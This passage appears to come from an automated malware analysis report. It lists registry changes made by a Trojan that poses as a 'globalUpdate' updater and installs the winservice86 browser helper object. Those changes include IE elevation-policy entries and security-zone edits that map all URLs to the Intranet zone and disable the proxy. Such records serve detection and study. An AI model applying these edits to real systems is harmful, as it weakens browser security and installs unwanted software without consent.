[HKLM\SOFTWARE\GlobalUpdate\Update\Clients\{430FD4D0-B729-4F61-AA34-91526481799D}]
"pv" = "1.3.25.0"
[HKLM\SOFTWARE\MozillaPlugins\@staging.google.com/globalUpdate Update;version=10]
"vendor" = "globalUpdate"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F5 88 C3 36 07 0E DE 7F DC A9 ED DE ED E2 55 71"
[HKCR\globalUpdate.OneClickCtrl.10\CLSID]
"(Default)" = "{5645E0E7-FC12-43BF-A6E4-F9751942B298}"
[HKLM\SOFTWARE\GlobalUpdate\Update]
"Path" = "%Program Files%\globalUpdate\Update\GoogleUpdate.exe"
"Version" = "1.3.25.0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKLM\SOFTWARE\MozillaPlugins\@staging.google.com/globalUpdate Update;version=10]
"Path" = "%Program Files%\globalUpdate\Update\1.3.25.0\npGoogleUpdate4.dll"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{C7BF8F4B-7BC7-4F42-B944-3D28A3A86D8A}]
"AppPath" = "%Program Files%\globalUpdate\Update\1.3.25.0"
[HKCR\MIME\Database\Content Type\application/x-vnd.google.oneclickctrl.10]
"CLSID" = "{5645E0E7-FC12-43BF-A6E4-F9751942B298}"
[HKCR\CLSID\{C7BF8F4B-7BC7-4F42-B944-3D28A3A86D8A}\InprocServer32]
"ThreadingModel" = "Apartment"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{5645E0E7-FC12-43BF-A6E4-F9751942B298}]
"AppPath" = "%Program Files%\globalUpdate\Update"
[HKCR\CLSID\{C7BF8F4B-7BC7-4F42-B944-3D28A3A86D8A}\ProgID]
"(Default)" = "globalUpdate.Update3WebControl.4"
[HKCR\CLSID\{5645E0E7-FC12-43BF-A6E4-F9751942B298}\InprocServer32]
"(Default)" = "%Program Files%\globalUpdate\Update\1.3.25.0\npGoogleUpdate4.dll"
"ThreadingModel" = "Apartment"
[HKCR\globalUpdate.OneClickCtrl.10]
"(Default)" = "globalUpdate Update Plugin"
The Trojan deletes the following value(s) in system registry:
[HKLM\SOFTWARE\GlobalUpdate\Update]
"mi"
"eulaaccepted"
[HKLM\SOFTWARE\GlobalUpdate\Update\network\secure]
"c"
[HKLM\SOFTWARE\GlobalUpdate\Update]
"LastChecked"
[HKLM\SOFTWARE\GlobalUpdate\Update\ClientState\{430FD4D0-B729-4F61-AA34-91526481799D}]
"UpdateAvailableSince"
[HKLM\SOFTWARE\GlobalUpdate\Update]
"ui"
"uid"
[HKLM\SOFTWARE\GlobalUpdate\Update\ClientState\{430FD4D0-B729-4F61-AA34-91526481799D}]
"UpdateAvailableCount"
[HKLM\SOFTWARE\GlobalUpdate\Update\network\secure]
"sk"
The process GoogleUpdate.exe:3944 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F4 58 90 39 89 16 B8 29 AA 2D EF 95 C6 6A 4F A8"
[HKCU\Software\globalUpdate\Update\proxy]
"source" = "IE"
The Trojan deletes the following value(s) in system registry:
[HKLM\SOFTWARE\GlobalUpdate\Update\network\secure]
"sk"
"c"
The process GoogleUpdate.exe:476 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "12 35 6D 94 29 04 1E 59 A6 E8 CB A9 DB 20 2B EF"
The Trojan deletes the following value(s) in system registry:
[HKLM\SOFTWARE\GlobalUpdate\Update\network\secure]
"sk"
"c"
[HKLM\SOFTWARE\GlobalUpdate\Update]
"eulaaccepted"
The process GoogleUpdate.exe:2032 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A3 7E 01 12 B8 CD 08 A1 51 AA E0 02 82 43 95 5F"
[HKLM\SOFTWARE\GlobalUpdate\Update\ClientState\{84F03351-931D-41A5-A53D-6B5A7A5A2C96}]
"pv" = "1.3.25.0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\F]
"BaseClass" = "Drive"
[HKCU\Software\globalUpdate\Update\proxy]
"source" = "IE"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\C]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\D]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\A]
"BaseClass" = "Drive"
The Trojan deletes the following value(s) in system registry:
[HKLM\SOFTWARE\GlobalUpdate\Update\ClientState\{84F03351-931D-41A5-A53D-6B5A7A5A2C96}]
"tttoken"
[HKLM\SOFTWARE\GlobalUpdate\Update\network\secure]
"sk"
[HKLM\SOFTWARE\GlobalUpdate\Update]
"uid"
[HKLM\SOFTWARE\GlobalUpdate\Update\network\secure]
"c"
The process GoogleUpdate.exe:1936 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCR\globalUpdateUpdate.OnDemandCOMClassSvc\CurVer]
"(Default)" = "globalUpdateUpdate.OnDemandCOMClassSvc.1.0"
[HKCR\CLSID\{577975B8-C40E-43E6-B0DE-4C6B44088B52}\ProgID]
"(Default)" = "globalUpdateUpdate.Update3COMClassService.1.0"
[HKCR\AppID\{577975B8-C40E-43E6-B0DE-4C6B44088B52}]
"ServiceParameters" = "/comsvc"
[HKCR\CLSID\{3278F5CF-48F3-4253-A6BB-004CE84AF492}]
"(Default)" = "Google Update Legacy On Demand"
[HKCR\globalUpdateUpdate.CoreClass\CurVer]
"(Default)" = "globalUpdateUpdate.CoreClass.1"
[HKCR\globalUpdateUpdate.CoreClass\CLSID]
"(Default)" = "{3B5702BA-7F4C-4D1A-B026-1E9A01D43978}"
[HKCR\globalUpdateUpdate.Update3WebSvc.1.0]
"(Default)" = "GoogleUpdate Update3Web"
[HKCR\globalUpdateUpdate.Update3WebSvc]
"(Default)" = "GoogleUpdate Update3Web"
[HKCR\globalUpdateUpdate.Update3COMClassService.1.0]
"(Default)" = "Update3COMClass"
[HKCR\CLSID\{577975B8-C40E-43E6-B0DE-4C6B44088B52}]
"(Default)" = "Update3COMClass"
[HKCR\AppID\GoogleUpdate.exe]
"AppID" = "{577975B8-C40E-43E6-B0DE-4C6B44088B52}"
[HKCR\CLSID\{3278F5CF-48F3-4253-A6BB-004CE84AF492}]
"AppID" = "{3278F5CF-48F3-4253-A6BB-004CE84AF492}"
[HKCR\CLSID\{7E49F793-B3CD-4BF7-8419-B34B8BD30E61}\VersionIndependentProgID]
"(Default)" = "globalUpdateUpdate.Update3WebSvc"
[HKCR\CLSID\{3278F5CF-48F3-4253-A6BB-004CE84AF492}\VersionIndependentProgID]
"(Default)" = "globalUpdateUpdate.OnDemandCOMClassSvc"
[HKCR\globalUpdateUpdate.CoreClass]
"(Default)" = "Google Update Core Class"
[HKCR\globalUpdateUpdate.Update3WebSvc\CLSID]
"(Default)" = "{7E49F793-B3CD-4BF7-8419-B34B8BD30E61}"
[HKCR\globalUpdateUpdate.Update3COMClassService\CLSID]
"(Default)" = "{577975B8-C40E-43E6-B0DE-4C6B44088B52}"
[HKCR\CLSID\{3B5702BA-7F4C-4D1A-B026-1E9A01D43978}\VersionIndependentProgID]
"(Default)" = "globalUpdateUpdate.CoreClass"
[HKCR\AppID\{577975B8-C40E-43E6-B0DE-4C6B44088B52}]
"(Default)" = "ServiceModule"
[HKCR\CLSID\{3B5702BA-7F4C-4D1A-B026-1E9A01D43978}\ProgID]
"(Default)" = "globalUpdateUpdate.CoreClass.1"
[HKCR\globalUpdateUpdate.Update3COMClassService]
"(Default)" = "Update3COMClass"
[HKCR\globalUpdateUpdate.OnDemandCOMClassSvc]
"(Default)" = "Google Update Legacy On Demand"
[HKCR\globalUpdateUpdate.Update3WebSvc.1.0\CLSID]
"(Default)" = "{7E49F793-B3CD-4BF7-8419-B34B8BD30E61}"
[HKCR\globalUpdateUpdate.Update3COMClassService\CurVer]
"(Default)" = "globalUpdateUpdate.Update3COMClassService.1.0"
[HKCR\AppID\{3278F5CF-48F3-4253-A6BB-004CE84AF492}]
"ServiceParameters" = "/comsvc"
[HKCR\CLSID\{7E49F793-B3CD-4BF7-8419-B34B8BD30E61}\ProgID]
"(Default)" = "globalUpdateUpdate.Update3WebSvc.1.0"
[HKCR\AppID\{3278F5CF-48F3-4253-A6BB-004CE84AF492}]
"LocalService" = "globalUpdatem"
[HKCR\CLSID\{3B5702BA-7F4C-4D1A-B026-1E9A01D43978}]
"AppID" = "{3278F5CF-48F3-4253-A6BB-004CE84AF492}"
[HKCR\CLSID\{577975B8-C40E-43E6-B0DE-4C6B44088B52}]
"AppID" = "{577975B8-C40E-43E6-B0DE-4C6B44088B52}"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "4C 41 F5 11 07 A9 04 E6 CD 98 CB F8 47 74 7A 50"
[HKCR\globalUpdateUpdate.OnDemandCOMClassSvc.1.0]
"(Default)" = "Google Update Legacy On Demand"
[HKCR\CLSID\{3278F5CF-48F3-4253-A6BB-004CE84AF492}\ProgID]
"(Default)" = "globalUpdateUpdate.OnDemandCOMClassSvc.1.0"
[HKCR\globalUpdateUpdate.CoreClass.1\CLSID]
"(Default)" = "{3B5702BA-7F4C-4D1A-B026-1E9A01D43978}"
[HKCR\globalUpdateUpdate.CoreClass.1]
"(Default)" = "Google Update Core Class"
[HKCR\AppID\{577975B8-C40E-43E6-B0DE-4C6B44088B52}]
"LocalService" = "globalUpdate"
[HKCR\globalUpdateUpdate.Update3WebSvc\CurVer]
"(Default)" = "globalUpdateUpdate.Update3WebSvc.1.0"
[HKCR\AppID\{3278F5CF-48F3-4253-A6BB-004CE84AF492}]
"(Default)" = "ServiceModule"
[HKCR\globalUpdateUpdate.OnDemandCOMClassSvc\CLSID]
"(Default)" = "{3278F5CF-48F3-4253-A6BB-004CE84AF492}"
[HKCR\CLSID\{577975B8-C40E-43E6-B0DE-4C6B44088B52}\VersionIndependentProgID]
"(Default)" = "globalUpdateUpdate.Update3COMClassService"
[HKCR\globalUpdateUpdate.Update3COMClassService.1.0\CLSID]
"(Default)" = "{577975B8-C40E-43E6-B0DE-4C6B44088B52}"
[HKCR\CLSID\{7E49F793-B3CD-4BF7-8419-B34B8BD30E61}]
"(Default)" = "GoogleUpdate Update3Web"
[HKCR\CLSID\{3B5702BA-7F4C-4D1A-B026-1E9A01D43978}]
"(Default)" = "Google Update Core Class"
[HKCR\CLSID\{7E49F793-B3CD-4BF7-8419-B34B8BD30E61}]
"AppID" = "{3278F5CF-48F3-4253-A6BB-004CE84AF492}"
[HKCR\globalUpdateUpdate.OnDemandCOMClassSvc.1.0\CLSID]
"(Default)" = "{3278F5CF-48F3-4253-A6BB-004CE84AF492}"
The Trojan deletes the following registry key(s):
[HKCR\AppID\GoogleUpdate.exe]
The process 17b03655-7c85-4e93-aec7-7ee27469780e-2.exe:2600 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "5D 61 B7 7F B7 9F 4C ED B5 6F F7 42 2C C1 2B 9E"
[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{1334A6C0-E0E2-42B3-A8C4-8DEA6895E5E9}]
"AppPath" = "%Program Files%\winservice86"
[HKCU\Software\Microsoft\Internet Explorer\ApprovedExtensionsMigration]
"{11111111-1111-1111-1111-110611471155}" = ""
[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{159B8922-349F-4817-B54B-2C5218FB596}]
"AppPath" = "%Program Files%\winservice86"
"Policy" = "3"
[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{CCE61A03-E80E-4CA5-BCE1-164EA93E85D}]
"AppPath" = "%Program Files%\winservice86"
[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{1334A6C0-E0E2-42B3-A8C4-8DEA6895E5E9}]
"AppName" = "17b03655-7c85-4e93-aec7-7ee27469780e-2.exe-helper.exe"
[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{CCE61A03-E80E-4CA5-BCE1-164EA93E85D}]
"Policy" = "3"
[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{1334A6C0-E0E2-42B3-A8C4-8DEA6895E5E9}]
"Policy" = "3"
[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{CCE61A03-E80E-4CA5-BCE1-164EA93E85D}]
"AppName" = "17b03655-7c85-4e93-aec7-7ee27469780e-2.exe-buttonutil.exe"
[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{159B8922-349F-4817-B54B-2C5218FB596}]
"AppName" = "17b03655-7c85-4e93-aec7-7ee27469780e-2.exe-codedownloader.exe"
[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{3796FDEE-79E3-44AF-AAD4-BBDBF6E1C55E}]
"Policy" = "3"
"AppName" = "17b03655-7c85-4e93-aec7-7ee27469780e-2.exe-buttonutil64.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Ext\CLSID]
"{11111111-1111-1111-1111-110611471155}" = "1"
[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{3796FDEE-79E3-44AF-AAD4-BBDBF6E1C55E}]
"AppPath" = "%Program Files%\winservice86"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Internet Explorer\ApprovedExtensionsMigration]
"Timestamp"
The process f56fe68c-ded6-4656-a272-5100e7b20016.exe:356 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"
"NetHood" = "%Documents and Settings%\%current user%\NetHood"
"Fonts" = "%WinDir%\Fonts"
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"PrintHood" = "%Documents and Settings%\%current user%\PrintHood"
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
"Templates" = "%Documents and Settings%\%current user%\Templates"
"SendTo" = "%Documents and Settings%\%current user%\SendTo"
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "2F 7A 13 E3 74 1B A1 1E 22 F2 42 83 C6 93 A3 48"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Recent" = "%Documents and Settings%\%current user%\Recent"
"Favorites" = "%Documents and Settings%\%current user%\Favorites"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Startup" = "%Documents and Settings%\All Users\Start Menu\Programs\Startup"
The process 17b03655-7c85-4e93-aec7-7ee27469780e-11.exe:1676 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "22 B8 EF 07 45 62 71 F2 C0 1F CD 6C AA F9 EC B5"
[HKLM\SOFTWARE\Tempo]
"(Default)" = "tempo"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
The Trojan deletes the following registry key(s):
[HKLM\SOFTWARE\Tempo]
The process 17b03655-7c85-4e93-aec7-7ee27469780e-4.exe:1936 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "3C 90 E6 8B C3 89 B7 8A 48 11 37 9B 49 48 05 7C"
[HKLM\SOFTWARE\Tempo]
"(Default)" = "tempo"
The Trojan deletes the following registry key(s):
[HKLM\SOFTWARE\Tempo]
The process winservice86-bg.exe:2952 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "60 62 9B 3A 74 C7 7E 5A D7 9F 50 C9 E5 DA 1B A1"
The process winservice86-codedownloader.exe:2888 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1F 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "54 28 FC A9 F1 AD 20 35 6E 84 27 D8 47 E2 FC 3A"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process winservice86-codedownloader.exe:2796 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1E 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "5A B5 DB 82 26 76 08 BF EF 7E DF CF EC 86 B8 AD"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process regsvr32.exe:2472 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCR\583e31c01eeb0132f0d1712b8d7ccf2e0064755.Sandbox]
"(Default)" = "583e31c01eeb0132f0d1712b8d7ccf2e0064755.Sandbox"
[HKCR\583e31c01eeb0132f0d1712b8d7ccf2e0064755.BHO.1]
"(Default)" = "583e31c01eeb0132f0d1712b8d7ccf2e0064755"
[HKCR\CLSID\{22222222-2222-2222-2222-220622472255}\InprocServer32]
"ThreadingModel" = "Apartment"
[HKCR\TypeLib\{44444444-4444-4444-4444-440644474455}\1.0\HELPDIR]
"(Default)" = "%Program Files%\winservice86"
[HKCR\CLSID\{22222222-2222-2222-2222-220622472255}\ProgID]
"(Default)" = "583e31c01eeb0132f0d1712b8d7ccf2e0064755.Sandbox.1"
[HKCR\CLSID\{22222222-2222-2222-2222-220622472255}]
"(Default)" = "583e31c01eeb0132f0d1712b8d7ccf2e0064755.Sandbox"
[HKCR\Interface\{55555555-5555-5555-5555-550655475555}\TypeLib]
"Version" = "1.0"
[HKCR\583e31c01eeb0132f0d1712b8d7ccf2e0064755.Sandbox.1\CLSID]
"(Default)" = "{22222222-2222-2222-2222-220622472255}"
[HKCR\583e31c01eeb0132f0d1712b8d7ccf2e0064755.Sandbox\CurVer]
"(Default)" = "583e31c01eeb0132f0d1712b8d7ccf2e0064755.Sandbox"
[HKCR\Interface\{66666666-6666-6666-6666-660666476655}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\CLSID\{11111111-1111-1111-1111-110611471155}\InprocServer32]
"(Default)" = "%Program Files%\winservice86\winservice86-bho.dll"
[HKCR\CLSID\{11111111-1111-1111-1111-110611471155}\Implemented Categories]
"(Default)" = ""
[HKCR\Interface\{66666666-6666-6666-6666-660666476655}]
"(Default)" = "ISandBox"
[HKCR\CLSID\{11111111-1111-1111-1111-110611471155}\Implemented Categories\{59fb2056-d625-48d0-a944-1a85b5ab2640}]
"(Default)" = ""
[HKCR\583e31c01eeb0132f0d1712b8d7ccf2e0064755.BHO]
"(Default)" = "583e31c01eeb0132f0d1712b8d7ccf2e0064755"
[HKCR\Interface\{55555555-5555-5555-5555-550655475555}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\CLSID\{11111111-1111-1111-1111-110611471155}]
"(Default)" = "winservice86"
[HKCR\CLSID\{22222222-2222-2222-2222-220622472255}\TypeLib]
"(Default)" = "{44444444-4444-4444-4444-440644474455}"
[HKCR\Interface\{55555555-5555-5555-5555-550655475555}]
"(Default)" = "ICrossriderBHO"
[HKCR\583e31c01eeb0132f0d1712b8d7ccf2e0064755.BHO.1\CLSID]
"(Default)" = "{11111111-1111-1111-1111-110611471155}"
[HKCR\CLSID\{11111111-1111-1111-1111-110611471155}\InprocServer32]
"ThreadingModel" = "Apartment"
[HKCR\CLSID\{22222222-2222-2222-2222-220622472255}\InprocServer32]
"(Default)" = "%Program Files%\winservice86\winservice86-bho.dll"
[HKCR\Interface\{55555555-5555-5555-5555-550655475555}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\CLSID\{11111111-1111-1111-1111-110611471155}\ProgID]
"(Default)" = "583e31c01eeb0132f0d1712b8d7ccf2e0064755.BHO.1"
[HKCR\Interface\{66666666-6666-6666-6666-660666476655}\TypeLib]
"Version" = "1.0"
[HKCR\583e31c01eeb0132f0d1712b8d7ccf2e0064755.BHO\CurVer]
"(Default)" = "583e31c01eeb0132f0d1712b8d7ccf2e0064755"
[HKCR\TypeLib\{44444444-4444-4444-4444-440644474455}\1.0]
"(Default)" = "583e31c01eeb0132f0d1712b8d7ccf2e0064755 Type Library"
[HKCR\583e31c01eeb0132f0d1712b8d7ccf2e0064755.BHO\CLSID]
"(Default)" = "{11111111-1111-1111-1111-110611471155}"
